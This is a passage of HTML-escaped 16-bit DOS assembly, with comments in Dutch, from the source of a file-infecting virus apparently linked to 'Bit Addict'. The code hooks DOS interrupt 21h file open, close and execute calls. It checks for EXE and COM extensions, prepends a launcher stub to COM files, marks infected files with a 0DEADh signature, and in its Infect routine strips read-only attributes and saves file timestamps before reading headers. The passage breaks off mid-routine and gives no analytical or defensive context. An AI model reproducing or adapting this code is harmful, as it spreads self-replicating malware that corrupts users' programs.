&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp; EOI&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; met Bit Addict&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; popf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pushf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldInt21&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pushf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; Infect&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; popf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; retf&amp;nbsp;&amp;nbsp;&amp;nbsp; 2&lt;br /&gt;
&lt;br /&gt;
Open:&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; CheckExtension&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; fn 3ch en 3dh&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp; EOI&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldInt21&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@92&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pushf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; di&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si,dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,offset File1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr es:[di],0&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@90&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,offset File2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr es:[di],0&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@91&lt;br /&gt;
@@90:&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; stosw&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,70&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; rep&amp;nbsp;&amp;nbsp;&amp;nbsp; movsb&lt;br /&gt;
@@91:&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; di&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; popf&lt;br /&gt;
@@92:&amp;nbsp;&amp;nbsp;&amp;nbsp; retf&amp;nbsp;&amp;nbsp;&amp;nbsp; 2&lt;br /&gt;
&lt;br /&gt;
Close:&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,cs:File1&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; fn 3eh&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@93&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,cs:File2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; EOI&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldInt21&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si,offset File2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; short @@94&lt;br /&gt;
@@93:&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; cs:OldInt21&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; si,offset File1&lt;br /&gt;
@@94:&amp;nbsp;&amp;nbsp;&amp;nbsp; jc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@95&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pushf&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; lea&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,[si+2]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; Infect&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; popf&lt;br /&gt;
@@95:&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; word ptr cs:[si],0&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; retf&amp;nbsp;&amp;nbsp;&amp;nbsp; 2&lt;br /&gt;
&lt;br /&gt;
Read:&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; EOI&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; fn 3fh&lt;br /&gt;
&lt;br /&gt;
Write:&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; EOI&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; fn 40h&lt;br /&gt;
&lt;br /&gt;
CheckExtension:&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; controleer of de extensie&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; wel exe of com is&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; di&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; di,dx&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; zoek het einde van de&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; xor&amp;nbsp;&amp;nbsp;&amp;nbsp; al,al&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; file-naam&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,70&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; repne&amp;nbsp;&amp;nbsp;&amp;nbsp; scasb&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@65&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; std&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; al,'.'&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; zoek de laatste punt&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; neg&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,70&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; std&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; repne&amp;nbsp;&amp;nbsp;&amp;nbsp; scasb&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@65&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; lea&amp;nbsp;&amp;nbsp;&amp;nbsp; si,[di+2]&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cld&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; lodsw&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; eerste 2 letters&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; and&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,0dfdfh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; maak hoofdletters&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,5845h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; 'EX'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@64&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4f43h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; 'CO'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@65&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; lodsb&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; 3e letter&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; and&amp;nbsp;&amp;nbsp;&amp;nbsp; al,0dfh&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; al,4dh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; 'M'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@66&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; short @@65&lt;br /&gt;
@@64:&amp;nbsp;&amp;nbsp;&amp;nbsp; lodsb&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; 3e letter&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; and&amp;nbsp;&amp;nbsp;&amp;nbsp; al,0dfh&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; al,45h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; 'E'&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; je&amp;nbsp;&amp;nbsp;&amp;nbsp; @@66&lt;br /&gt;
@@65:&amp;nbsp;&amp;nbsp;&amp;nbsp; stc&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmp&amp;nbsp;&amp;nbsp;&amp;nbsp; short @@67&lt;br /&gt;
@@66:&amp;nbsp;&amp;nbsp;&amp;nbsp; clc&lt;br /&gt;
@@67:&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; di&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; ret&lt;br /&gt;
&lt;br /&gt;
ComHeader:&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; dit stukje wordt voor een&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,cs&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; COM-file geplaatst, en is om&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; add&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,0100h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; het virus te starten.&lt;br /&gt;
OldSize&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; this word-2&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,offset Begin&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; retf&lt;br /&gt;
Dead&amp;nbsp;&amp;nbsp;&amp;nbsp; equ&amp;nbsp;&amp;nbsp;&amp;nbsp; $&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; dw&amp;nbsp;&amp;nbsp;&amp;nbsp; 0DEADh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; signature, om te controleren&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; of een file al eens eerder&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; besmet is.&lt;br /&gt;
&lt;br /&gt;
Infect:&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ax&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; Infecteer een file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; bx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; si&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; di&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; bp&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4300h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; lees attributen en bewaar&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; ze&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmpc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@83&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; test&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,1&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jz&amp;nbsp;&amp;nbsp;&amp;nbsp; @@71&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,4301h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; set Read-Only attribuut&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; and&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,0fffeh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; op nul&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmpc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@82&lt;br /&gt;
@@71:&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,3d02h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; open de file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmpc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@82&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; bx,ax&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,5700h&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; lees de datum en tijd en&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; bewaar ze&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmpc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@81&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; dx&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; ds=es=cs&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; ds&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; push&amp;nbsp;&amp;nbsp;&amp;nbsp; cs&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; pop&amp;nbsp;&amp;nbsp;&amp;nbsp; es&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; ah,3fh&amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; &amp;nbsp;&amp;nbsp;&amp;nbsp; ; lees de header van de file&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; cx,HeaderLength&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; mov&amp;nbsp;&amp;nbsp;&amp;nbsp; dx,offset Header&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; call&amp;nbsp;&amp;nbsp;&amp;nbsp; DOS&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jmpc&amp;nbsp;&amp;nbsp;&amp;nbsp; @@80&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; cmp&amp;nbsp;&amp;nbsp;&amp;nbsp; ax,HeaderLength&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; jne&amp;nbsp;&amp;nbsp;&amp;nbsp; @@75&lt;br /&gt;
